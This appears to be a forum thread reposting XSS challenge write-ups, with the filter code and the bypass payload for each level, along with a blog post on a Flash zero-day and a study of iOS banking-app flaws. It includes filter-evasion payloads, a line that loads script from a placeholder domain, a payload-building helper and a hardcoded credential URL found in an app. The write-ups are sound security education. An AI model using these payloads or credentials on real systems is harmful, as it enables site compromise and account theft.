htmlEscape function, we can use hex or octal encoding for the “<” symbol and bypass the escaping function. Valid solutions: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]\x3csvg onload=alert(1)[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]\74svg onload=alert(1)[/TD] [/TR] [/TABLE] Level 11: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]function escape(s) { // Spoiler for level 2 s = JSON.stringify(s).replace(/<\/script/gi, ''); return '<script>console.log(' + s + ');</script>'; }[/TD] [/TR] [/TABLE] I’ve seen similar escaping functions in real applications, normally it is not a good idea to fix the input data, you either accept it or reject it but trying to fix it normally leads to bypasses. In this case the escape function replaces “</script” with an empty string so shortest solution is: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]</</scriptscript><script>alert(1)//[/TD] [/TR] [/TABLE] Level 12: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]function escape(s) { // Pass inn "callback#userdata" var thing = s.split(/#/); if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback'; var obj = {'userdata': thing[1] }; var json = JSON.stringify(obj).replace(/\//g, '\\/'); return "<script>" + thing[0] + "(" + json +")</script>"; }[/TD] [/TR] [/TABLE] Similar to level 7 but this time the backslash is also escaped so we use a similar vector with a different way to comment the junk out: Solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]'#';alert(1)<!--[/TD] [/TR] [/TABLE] It will render: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]<script>'({"userdata":"';alert(1)<!--"})</script>[/TD] [/TR] [/TABLE] Level 13: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19[/TD] [TD=class: code]function escape(s) { var tag = document.createElement('iframe'); // For this one, you get to run any code you want, but in a "sandboxed" iframe. 
// // http://print.alf.nu/?text=... just outputs whatever you pass in. // // Alerting from print.alf.nu won't count; try to trigger the one below. s = '<script>' + s + '<\/script>'; tag.src = 'http://print.alf.nu/?html=' + encodeURIComponent(s); window.WINNING = function() { youWon = true; }; tag.onload = function() { if (youWon) alert(1); }; document.body.appendChild(tag); }[/TD] [/TR] [/TABLE] Iframes have a interesting feature: setting the name attribute on an iframe sets the name property of the iframe’s global window object to the value of that string. Now, the interesting part is that it can be done the other way around, so an iframe can define its own window.name and the new name will be injected in the parent’s global window object if it does not exist already (it cannot overwrite it). So if we fool the framed site to declare its window.name as “youWon”, a youWon variable will be setted in the parent global window object and so the “alert(1)” will be popped Solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]name='youWon'[/TD] [/TR] [/TABLE] Level 14: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18[/TD] [TD=class: code]<!DOCTYPE HTML> function escape(s) { function json(s) { return JSON.stringify(s).replace(/\//g, '\\/'); } function html(s) { return s.replace(/[<>"&]/g, function(s) { return '' + s.charCodeAt(0) + ';'; }); } return ( '<script>' + 'var url = ' + json(s) + '; // We\'ll use this later ' + '</script>\n\n' + ' <!-- for debugging -->\n' + ' URL: ' + html(s) + '\n\n' + '<!-- then suddenly -->\n' + '<script>\n' + ' if (!/^http:.*/.test(url)) console.log("Bad url: " + url);\n' + ' else new Image().src = url;\n' + '</script>' ); }[/TD] [/TR] [/TABLE] In order to solve this level we need to be familiar with an HTML5 parser “feature” when dealing with comments in JS blocks. This feature is well described in this post (thanks for the hint @cgvwzq!). The trick is that injecting an HTML5 single line comment “<!—” followed by a “<script>” open tag will move the parser into the “script data double escaped state” until the closing script tag is found and then it will transition into “script data escaped state” and it will treat anything from the end of the string where we injected the “<!—<script>” as JS! only thing we need to do is making sure there is a “—>” so that the parser does not throw an invalid syntax exception. So basically, if there is a “—>” somewhere in the code (or we can inject it) we can fool the parser into processing HTML as JS. The string where we inject “<!—<script>” will still be considered as a JS string an everything following the string will become JS. For this level we will make the JS engine to parse the HTML part (URL: xxx). In order to do so, we will start our payload with “alert(1)” so that the first JS evaluated will be “URL: alert(1)” then we want to comment out the remaining JS code so we will insert a multi-line comment start “/”. This way everything else will be commented out until we reach the “/” present in the regexp; the code from that point on will be evaluated. In order to get a valid regexp we will also inject “if(/a/” before the multi-line comment start. 
So our payload will look like: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]alert(1);/*<!--<script>*/if(/a//*[/TD] [/TR] [/TABLE] The resulting code will be: Now if we clean it up and remove the comments (in grey): [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]<script> var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*"; URL: alert(1); if(/a/.test(url)) console.log("Bad url: " + url); else new Image().src = url; </script>[/TD] [/TR] [/TABLE] We can get it even shorter with: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]if(alert(1)/*<!--<script>[/TD] [/TR] [/TABLE] This will turn into: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]<script> var url = "alert(1);\/*<!--<script>*\/if(\/a\/\/*"; URL: if(alert(1).test(url)) console.log("Bad url: " + url); else new Image().src = url; </script>[/TD] [/TR] [/TABLE] Level 15: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8[/TD] [TD=class: code]function escape(s) { return s.split('#').map(function(v) { // Only 20% of slashes are end tags; save 1.2% of total // bytes by only escaping those. var json = JSON.stringify(v).replace(/<\//g, '<\\/'); return '<script>console.log('+json+')</script>'; }).join(''); }[/TD] [/TR] [/TABLE] We can use the same trick we used for level 14. We can start with something simple like: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]payload1#payload2[/TD] [/TR] [/TABLE] that will render: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]<script>console.log("payload1")</script><script>console.log("payload2")</script>[/TD] [/TR] [/TABLE] We can take advantage of HTML5 “<!—<script>” trick to change the way the parser treats the code between the two blocks and inject our “alert(1)” payload. Note that this trick only works in HTML5 documents and we will need to inject a closing “—>” since it is not present in the code The solution is: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]<!--<script>#)/;alert(1)//-->[/TD] [/TR] [/TABLE] This will render: Since we transition to “script data double escaped state” when the parser finds “<!—<script>”, the JS engine will receive the following valid JS expression: That can be interpreted as: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]console.log("junk_string") < /junk_regexp/ ; alert(1) // -->[/TD] [/TR] [/TABLE] Where: junk_string: <!—<script> junk_regexp: script><script>console.log(“) Actually you can see in the console that the first console.log writes ‘<!—<script>’ In order to make it even shorter we can replace “//” with unicode \u2028 as suggested by Mario Level 16: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23[/TD] [TD=class: code]function escape(text) { // *cough* not done var i = 0; window.the_easy_but_expensive_way_out = function() { alert(i++) }; // "A JSON text can be safely passed into JavaScript's eval() function // (which compiles and executes a string) if all the characters not // enclosed in strings are in the set of characters that form JSON // tokens." 
if (!(/[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/.test( text.replace(/"(\\.|[^"\\])*"/g, '')))) { try { var val = eval('(' + text + ')'); console.log('' + val); } catch (_) { console.log('Crashed: '+_); } } else { console.log('Rejected.'); } }[/TD] [/TR] [/TABLE] This level is based on a real world filter described by Stefano Di Paola in this post If we study the regexp carefully we will see that the letter “s” is allowed since its within the “u-r” interval, that allows us to use the word “self” and with that we can craft a valid JSON payload. The trick is that we will be adding “0” to our object so the JS engine will need to calculate the valueOf our object. So if we define the “valueOf” function as the “the_easy_but_expensive_way_out” global function, we will be able to invoke it during the arithmetic operation. The problem is that it will alert “0” since “i” its initialized with “0”, but we can do it twice to alert a “1”. Long Solution: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]{"valueOf":self["the_easy_but_expensive_way_out"]}+0,{"valueOf":self["the_easy_but_expensive_way_out"]}[/TD] [/TR] [/TABLE] That is a nice trick to execute a function when parenthesis are not allowed. But there some more like Gareth famous one: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]onerror=eval;throw['=1;alert\x281\x29'][/TD] [/TR] [/TABLE] You can get a shorter solution for IE only as explained by Stefano Di Paola in his post [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]{"valueOf":self["location"],"toString":[]["join"],0:"javascript:alert(1)","length":1}[/TD] [/TR] [/TABLE] And thats all folks, thanks for reading! Posted by Alvaro Muñoz Jan 8th, 2014 Sursa: escape.alf.nu XSS Challenges Write-ups (Part 2) - PwnTesting
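The alphabet-indexing approach from level 9 is tedious to do by hand, so here is a small helper of my own (not part of the original write-up) that builds the _[i]+_[j]+... expressions over the string produced by _=''+!1+!0+{}[0]+{} in JavaScript, i.e. "falsetrueundefined[object Object]". It is only a payload-construction aid; the resulting expression still has to be wrapped in the surrounding injection as shown above.

# Alphabet produced by _=''+!1+!0+{}[0]+{} in JavaScript.
ALPHABET = "false" + "true" + "undefined" + "[object Object]"

def js_index_expr(word, var="_"):
    """Build the var[i]+var[j]+... expression for a word, as used in the
    144-character level 9 solution."""
    parts = []
    for ch in word:
        i = ALPHABET.find(ch)
        if i < 0:
            raise ValueError("character %r is not in the alphabet" % ch)
        parts.append("%s[%d]" % (var, i))
    return "+".join(parts)

if __name__ == "__main__":
    for word in ("sort", "constructor", "alert"):
        print(word, "->", js_index_expr(word))
    # sort -> _[3]+_[19]+_[6]+_[5], matching the expression in the write-up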
  16. [h=1]escape.alf.nu XSS Challenges Write-ups[/h] These are my solutions to Erling Ellingsen escape.alf.nu XSS challenges. I found them very interesting and I learnt a lot from them (especially from the last ones to be published in Part 2). Im publishing my results since the game has been online for a long time now and there are already some sites with partial results. My suggestion, if you havent done it so far, is to go and try to solve them by yourselves…. so come on, dont be lazy, stop reading here and give them a try … … … … … Ok so if you have already solve them or need some hits, here are my solutions [h=1]Level 0:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code] function escape(s) { // Warmup. return '<script>console.log("'+s+'");</script>'; } [/TD] [/TR] [/TABLE] There is no encoding so the easiest solution is to close “log” call and inject our “alert” Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] ");alert(1," [/TD] [/TR] [/TABLE] [h=1]Level 1:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code] function escape(s) { // Escaping scheme courtesy of Adobe Systems, Inc. s = s.replace(/"/g, '\\"'); return '<script>console.log("' + s + '");</script>'; } [/TD] [/TR] [/TABLE] Function is escaping double quotes by adding two slashes. Shortest solution is to inject \“ so the escape function turns it into [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] \\\" [/TD] [/TR] [/TABLE] Effectively escaping the backslash but not the double quotes. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] \");alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 2:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code] function escape(s) { s = JSON.stringify(s); return '<script>console.log(' + s + ');</script>'; } [/TD] [/TR] [/TABLE] JSON.stringify() will escape double quotes (“) into (\”) but it does not escaps angle brackets (<>), so we can close the current script block and start a brand new one. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] </script><script>alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 3:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: code] function escape(s) { var url = 'javascript:console.log(' + JSON.stringify(s) + ')'; console.log(url); var a = document.createElement('a'); a.href = url; document.body.appendChild(a); a.click(); } [/TD] [/TR] [/TABLE] Again (“) is escaped but since we are within a URL context we can use URL encoding. In this case %22 for (”) Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] %22);alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 4:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 [/TD] [TD=class: code] function escape(s) { var text = s.replace(/</g, '<').replace('"', '"'); // URLs text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>'); // [[img123|Description]] text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">'); return text; } [/TD] [/TR] [/TABLE] The following characters are replaced: < ? < (all ocurrences) " ? " (just the first occurrence) The escape function also use a template like [[src|alt]] that becomes [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <img alt="alt" src="src.gif"> [/TD] [/TR] [/TABLE] We can use this template with any src and an alt starting with a double quote (“) that will be escaped, a second double quote (”) that won’t be escaped and then a new event handler like onload=“alert(1) that will be closed by the double quote inserted by the template. 
Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|""onload="alert(1)]] [/TD] [/TR] [/TABLE] It will be rendered as: [h=1]Level 5:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: code] function escape(s) { // Level 4 had a typo, thanks Alok. // If your solution for 4 still works here, you can go back and get more points on level 4 now. var text = s.replace(/</g, '<').replace(/"/g, '"'); // URLs text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>'); // [[img123|Description]] text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">'); return text; } [/TD] [/TR] [/TABLE] Now we cannot rely on the (“) regexp typo but we can still use the template function to generate an image tag executing our alert(1) when loaded. We will use any src and a URL that will be replaced by the second replace function. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|http://onload='alert(1)']] [/TD] [/TR] [/TABLE] The first replace function wont trigger with this payload The second replace function will act on the URL getting: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|<a href=http://onload='alert(1)]]">http://onload='alert(1)']]</a> [/TD] [/TR] [/TABLE] The third replace function will create our img tag [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <img alt="<a href="http://onload='alert(1)']]">http://onload='alert(1)'" src="a.gif"> [/TD] [/TR] [/TABLE] It will be rendered as: [h=1]Level 6:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 [/TD] [TD=class: code] function escape(s) { // Slightly too lazy to make two input fields. // Pass in something like "TextNode#foo" var m = s.split(/#/); // Only slightly contrived at this point. var a = document.createElement('div'); a.appendChild(document['create'+m[0]].apply(document, m.slice(1))); return a.innerHTML; } [/TD] [/TR] [/TABLE] The trick is to review all the functions in the DOM that begin with “create” and that dont escape characters. The shortest one is to use “createComment”. 
For example Comment#<foo> will create the following code: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <!--<foo>--> [/TD] [/TR] [/TABLE] From there, its easy to go to: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] Comment#><svg onload=alert(1) [/TD] [/TR] [/TABLE] That will render: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <!--><svg onload=alert(1)--> [/TD] [/TR] [/TABLE] [h=1]Level 7:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: code] function escape(s) { // Pass inn "callback#userdata" var thing = s.split(/#/); if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback'; var obj = {'userdata': thing[1] }; var json = JSON.stringify(obj).replace(/</g, '\\u003c'); return "<script>" + thing[0] + "(" + json +")</script>"; } [/TD] [/TR] [/TABLE] We will enclose the opening bracket and the json fixed contents with single quotes to transform it into a string and then we will be able to inject our js payload: Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] '#';alert(1)// [/TD] [/TR] [/TABLE] It will render: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <script>'({"userdata":"';alert(1)//"})</script> [/TD] [/TR] [/TABLE] [h=1]Level 8:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code] function escape(s) { // Courtesy of Skandiabanken return '<script>console.log("' + s.toUpperCase() + '")</script>'; } [/TD] [/TR] [/TABLE] There is no escaping function, only an upper case, so we can close the exisiting <script> tag and create a new tag (case insensitive) with an onload script using no alpha characters: These are some valid solutions: [TABLE] [TR] [TD=class: gutter] 1 2 3 [/TD] [TD=class: code] </script><svg><script>alert(1)// (52) </script><svg onload=alert(1)// (51) </script><svg onload=alert(1)// (50) [/TD] [/TR] [/TABLE] I guess people solving the challange with 28 characters or so did something like: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] </script><script src="<very short domain>"> [/TD] [/TR] [/TABLE] Posted by Alvaro Muñoz Jan 6th, 2014 Sursa: escape.alf.nu XSS Challenges Write-ups (Part 1) - PwnTesting
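These flawed escaping functions are easy to sanity-check outside the browser. As a quick illustration, the snippet below is a Python mirror of the level 1 JavaScript (not the original code) and shows why escaping double quotes without also escaping backslashes fails: the injected backslash neutralizes the one added by the filter.

def flawed_escape(s):
    # Mirror of the level 1 scheme: only double quotes get a backslash.
    return '<script>console.log("' + s.replace('"', '\\"') + '");</script>'

if __name__ == "__main__":
    payload = '\\");alert(1)//'   # the level 1 solution: \");alert(1)//
    print(flawed_escape(payload))
    # <script>console.log("\\");alert(1)//");</script>
    # The filter turns \" into \\", so the backslash is escaped instead of
    # the quote, the string closes early and alert(1) executes.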
  17. [h=3]CVE-2013-5331 evaded AV by using obscure Flash compression ZWS[/h] We recently came across what is likely the CVE-2013-5331 zero day (Adobe Flash embedded in an MS Office .doc) on virustotal.com (Biglietto Visita.doc, MD5: 2192f9b0209b7e7aa6d32a075e53126d, 0 detections on 2013-11-11, 2/49 on 2013-12-23). The filename is Italian for "visiting card" and could be related to MFA targeting in Italy. This exploit was patched on 2013-12-10 and was in the wild for at least a full month. While it appears to be the only CVE-2013-5331 sample on VirusTotal we could find, it is also interesting that the Flash exploit payload uses the very unusual ZWS compression (LZMA, the Lempel–Ziv–Markov chain algorithm originally used in 7-Zip); CWS (zlib) compression is far more common. The ZWS compression method, combined with embedding the Flash object inside MS Office documents, is very likely to evade most AV products. From our Cryptam database, related files with similar metadata:
5da6a1d46641044b782d5c169ccb8fbf 2013-06-28 CVE-2012-5054 7/46 2013-07-07
8d70043395a2d0e87096c67e0d68f931 2013-06-28 CVE-2013-0633 6/46 2013-07-18
Posted by DT at 2:42 AM Sursa: malware tracker blog: CVE-2013-5331 evaded AV by using obscure Flash compression ZWS
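For triage it helps to check the SWF signature directly, since the three-byte magic tells you which compression is in play. The sketch below is my own and assumes the standard SWF LZMA layout (3-byte signature, version byte, u32 uncompressed length, u32 compressed length, 5 LZMA property bytes, then the LZMA stream); it flags ZWS samples and attempts to recover the body with Python's lzma module.

import lzma
import struct
import sys

def inspect_swf(path):
    data = open(path, "rb").read()
    sig = data[:3]
    if sig == b"FWS":
        print("uncompressed SWF")
    elif sig == b"CWS":
        print("zlib-compressed SWF (the common case)")
    elif sig == b"ZWS":
        print("LZMA-compressed SWF (the unusual case discussed above)")
        # Assumed layout: the uncompressed length at offset 4 includes the
        # 8-byte header; LZMA properties sit at offset 12, data at offset 17.
        uncompressed_len = struct.unpack_from("<I", data, 4)[0]
        props, body = data[12:17], data[17:]
        # Rebuild an lzma_alone header so the stdlib can decode the stream.
        header = props + struct.pack("<Q", uncompressed_len - 8)
        try:
            out = lzma.decompress(header + body, format=lzma.FORMAT_ALONE)
            print("recovered %d bytes of SWF body" % len(out))
        except lzma.LZMAError as exc:
            print("LZMA decompression failed: %s" % exc)
    else:
        print("not a SWF (or the object is embedded deeper in the OLE file)")

if __name__ == "__main__":
    inspect_swf(sys.argv[1])

For samples embedded in a .doc, the Flash object first has to be carved out of the OLE container before this check applies.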
  18. Personal banking apps leak info through phone By Ariel Sanchez For several years I have been reading about flaws in home banking apps, but I was skeptical. To be honest, when I started this research I was not expecting to find any significant results. The goal was to perform a black box and static analysis of worldwide mobile home banking apps. The research used iPhone/iPad devices to test a total of 40 home banking apps from the top 60 most influential banks in the world. In order to obtain a global view of the state of security, some of the more important banks from the following countries were included in the research: Relevant Points The research was performed in 40 hours (non-consecutive). This research does not show the vulnerabilities found and how to exploit them in order to protect the owner of the app and their customers. All tests were only performed on the application (client side); the research excluded any server-side testing. Some of the affected banks were contacted and the vulnerabilities reported. Tests The following tests were performed for each application: Transport Security Plaintext Traffic Improper session handling Properly validate SSL certificates [*] Compiler Protection Anti-jailbreak protection Compiled with PIE Compiled with stack cookies Automatic Reference Counting [*] UIWebViews Data validation (input, output) Analyze UIWebView implementations [*] Insecure data storage SQLlite database File caching Check property list files Check log files [*] Logging Custom logs NSLog statements Crash reports files [*] Binary analysis Disassemble the application Detect obfuscation of the assembly code protections Detect anti-tampering protections Detect anti-debugging protections Protocol handlers Client-side injection Third-party libraries Summary All of the applications could be installed on a jailbroken iOS device. This helped speed up the static and black box analysis. Black Box Analysis Results The following tools were used for the black box analysis: otool (object file displaying tool)[1] Burp pro (proxy tool)[2] ssh (Secure Shell) 40% of the audited apps did not validate the authenticity of SSL certificates presented. This makes them susceptible to Man in The Middle (MiTM) attacks.[3] A few apps (less than 20%) did not have Position Independent Executable (PIE) and Stack Smashing Protection enabled. This could help to mitigate the risk of memory corruption attacks. >#otool –hv MobileBank MobileBank: Mach header magic cputype cpusubtype caps filetype ncmds sizeofcmds flags MH_MAGIC ARM V6 0x00 EXECUTE 24 3288 NOUNDEFS DYLDLINK PREBOUND TWOLEVEL Many of the apps (90%) contained several non-SSL links throughout the application. This allows an attacker to intercept the traffic and inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt or similar scam. Moreover, it was found that 50% of the apps are vulnerable to JavaScript injections via insecure UIWebView implementations. In some cases, the native iOS functionality was exposed, allowing actions such as sending SMS or emails from the victim’s device. A new generation of phishing attacks has become very popular in which the victim is prompted to retype his username and password “because the online banking password has expired”. The attacker steals the victim’s credentials and gains full access to the customer’s account. The following example shows a vulnerable UIWebView implementation from one of the home baking apps. 
It allows a false HTML form to be injected which an attacker can use to trick the user into entering their username and password and then send their credentials to a malicious site. Another concern brought to my attention while doing the research was that 70% of the apps did not have any alternative authentication solutions, such as multi-factor authentication, which could help to mitigate the risk of impersonation attacks. Most of the logs files generated by the apps, such as crash reports, exposed sensitive information. This information could be leaked and help attackers to find and develop 0day exploits with the intention of targeting users of the application. Most of the apps disclosed sensitive information through the Apple system log. The following example was extracted from the Console system using an iPhone Configuration Utility (IPCU) tool. The application dumps user credentials of the authentication process. … CA_DEBUG_TRANSACTIONS=1 in environment to log backtraces. Jun 22 16:20:37 Test Bankapp[2390] <Warning>: <v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/"> <v:Header /> <v:Body> <n0:loginWithRole id="o0" c:root="1" xmlns:n0="http://mobile.services.xxxxxxxxx.com/"> <in0 i:type="d:string">USER-ID</in1> <in1 i:type="d:string">XRS</in2> <in2 i:type="d:string">PASSWORD</in3> <in3 i:type="d:string">xxxxxxxx</in4> </n0:loginWithRole> </v:Body> </v:Envelope> Jun 22 16:20:37 Test Bankapp[2390] <Warning>: ]]]]]]]]]]]]] wxxx.xxxxx.com Jun 22 16:20:42 Test Bankapp[2390] <Warning>: RETURNED: Jun 22 16:20:42 Test Bankapp [2390] <Warning>: CoreAnimation: warning, deleted thread with uncommitted CATransaction; set CA_DEBUG_TRANSACTIONS=1 in environment to log backtraces. … Static Analysis Results The following tools were used for the static analysis and decryption: IDA PRO (disassembler tool) [4] Clutch (cracking utility) [5] objc-helper-plugin-ida [6] ssh (Secure Shell) gdb (debugger tool) IPCU [7] The binary code of each app was decrypting using Clutch. A combination of decrypted code and code disassembled with IDA PRO was used to analyze the application. Hardcoded development credentials were found in the code. __text:00056350 ADD R0, PC ; selRef_sMobileBankingURLDBTestEnv__ __text:00056352 MOVT.W R2, #0x46 __text:00056356 ADD R2, PC ; "https://mob_user:T3stepwd@db.internal/internal/db/start.do?login=mobileEvn" __text:00056358 LDR R1, [R0] ; "setMobileBankingURLDBTestEnv_iPad_mobil"... __text:0005635A MOV R0, R4 __text:0005635C BLX _objc_msgSend __text:00056360 MOV R0, (selRef_setMobileBankingURLDBTestEnvWithValue_iPad_mobileT_ - 0x56370) ; selRef_setMobileBankingURLDBTestEnvWithValue_iPad_mobileT_ __text:00056368 MOVW R2, #0xFA8A __text:0005636C ADD R0, PC ; selRef_setMobileBankingURLDBTestEnvWithValue_i_mobileT_ __text:0005636E MOVT.W R2, #0x46 __text:00056372 ADD R2, PC ; "https://mob_user:T3stepwd@db.internal/internal/db/start.do?login=mobileEvn&branch=%@&account=%@&subaccount=%@" __text:00056374 LDR R1, [R0] ; "setMobileBankingURLDBTestEnvWith_i"... __text:00056376 MOV R0, R4 __text:00056378 BLX _objc_msgSend By using hardcoded credentials, an attacker could gain access to the development infrastructure of the bank and infest the application with malware causing a massive infection for all of the application’s users. 
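Hardcoded URLs with embedded credentials like the one above are usually easy to spot once the binary has been decrypted. A rough, hypothetical triage helper (not part of the IOActive methodology, which used IDA) is to grep the decrypted Mach-O for user:password@host patterns:

import re
import sys

# Loose pattern for URLs that embed credentials, e.g. https://user:pass@host/...
CRED_URL = re.compile(rb"https?://[\w.%+-]+:[\w.%+-]+@[\w./?=&%+-]+")

def scan_for_credentials(path):
    data = open(path, "rb").read()
    for hit in sorted(set(CRED_URL.findall(data))):
        print(hit.decode("latin-1", "replace"))

if __name__ == "__main__":
    scan_for_credentials(sys.argv[1])   # point it at the decrypted binary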
Internal functionality exposed via plaintext connections (HTTP) could allow an attacker with access to the network traffic to intercept or tamper with data. __text:0000C980 ADD R2, PC ; "http://%@/news/?version=%u" __text:0000C982 MOVT.W R3, #9 __text:0000C986 LDR R1, [R1] ; "stringWithFormat:" __text:0000C988 ADD R3, PC ; "Mecreditbank.com" __text:0000C98A STMEA.W SP, {R0,R5} __text:0000C98E MOV R0, R4 __text:0000C990 BLX _objc_msgSend __text:0000C994 MOV R2, R0 ... __text:0001AA70 LDR R4, [R2] ; _OBJC_CLASS_$_NSString __text:0001AA72 BLX _objc_msgSend __text:0001AA76 MOV R1, (selRef_stringWithFormat_ - 0x1AA8A) ; selRef_stringWithFormat_ __text:0001AA7E MOV R2, (cfstr_HttpAtmsOpList - 0x1AA8C) ; "http://%@/atms/?locale=%@&version=%u" __text:0001AA86 ADD R1, PC; selRef_stringWithFormat_ __text:0001AA88 ADD R2, PC; "http://%@/atms/version=%u" __text:0001AA8A __text:0001AA8A loc_1AA8A ; CODE XREF: -[branchesViewController processingVersion:]+146j __text:0001AA8A MOVW R3, #0x218C __text:0001AA8E LDR R1, [R1] __text:0001AA90 MOVT.W R3, #8 __text:0001AA94 STMEA.W SP, {R0,R5} __text:0001AA98 ADD R3, PC ; "Mecreditbank.com" __text:0001AA9A MOV R0, R4 __text:0001AA9C BLX _objc_msgSend Moreover, 20% of the apps sent activation codes for accounts though plainttext communication (HTTP). Even if this functionality is limited to initial account setup, the associated risk high. If an attacker intercepts the traffic he could hijack a session and steal the victim’s account without any notification or evidence to detect the attack. After taking a close look at the file system of each app, some of them used an unencrypted Sqlite database and stored sensitive information, such as details of customer’s banking account and transaction history. An attacker could use an exploit to access this data remotely, or if they have physical access to the device, could install jailbreak software in order to steal to the information from the file system of the victim’s device. The following example shows an Sqlite database structure taken from the file system of an app where bank account details were stored without encryption. Other minor information leaks were found, including: Internal IP addresses: __data:0008B590 _TakeMeToLocationURL DCD cfstr_Http10_1_4_133 __data:0008B590 ; DATA XREF: -[NavigationView viewDidLoad]+80o __data:0008B590 ; __nl_symbol_ptr:_TakeMeToLocationURL_ptro __data:0008B590 ; "http://100.10.1.13:8080/WebTestProject/PingTest.jsp" Internal file system paths: __cstring:000CC724 aUsersXXXXPro DCB "/Users/Scott/projects/HM_iphone/src/HBMonthView.m",0 Even though disclosing this information on its own doesn't have a significant impact, an attacker who collected a good number of these leaks could gain an understanding of the internal layout of the application and server-side infrastructure. This could enable an attacker to launch specific attacks targeting both the client- and server-side of the application. 
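The unencrypted SQLite finding is also easy to reproduce once the database file has been pulled from a jailbroken device: listing the tables and columns is usually enough to see whether account details are stored in the clear. A minimal, read-only sketch (a hypothetical helper, not the researcher's tooling):

import sqlite3
import sys

def dump_schema(db_path):
    """Print table and column names from an app database pulled off the
    device, to check what is being stored without encryption."""
    con = sqlite3.connect(db_path)
    try:
        tables = [row[0] for row in con.execute(
            "SELECT name FROM sqlite_master WHERE type='table'")]
        for table in tables:
            cols = [col[1] for col in con.execute('PRAGMA table_info("%s")' % table)]
            print("%s: %s" % (table, ", ".join(cols)))
    finally:
        con.close()

if __name__ == "__main__":
    dump_schema(sys.argv[1])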
Conclusions From a defensive perspective, the following recommendations could mitigate the most common flaws:
Ensure that all connections are performed using secure transfer protocols
Enforce SSL certificate checks in the client application
Protect sensitive data stored on the client side by encrypting it with the iOS data protection API
Add checks to detect jailbroken devices
Obfuscate the assembly code and use anti-debugging tricks to slow down attackers trying to reverse engineer the binary
Remove all debugging statements and symbols
Remove all development information from the production application
Home banking apps adapted for mobile devices, such as smartphones and tablets, have created a significant security challenge for worldwide financial firms. As this research shows, the financial industry should raise the security standards it applies to mobile home banking solutions.
References:
[1] http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html
[2] Burp Suite Editions
[3] https://www.owasp.org/index.php/Man-in-the-middle_attack
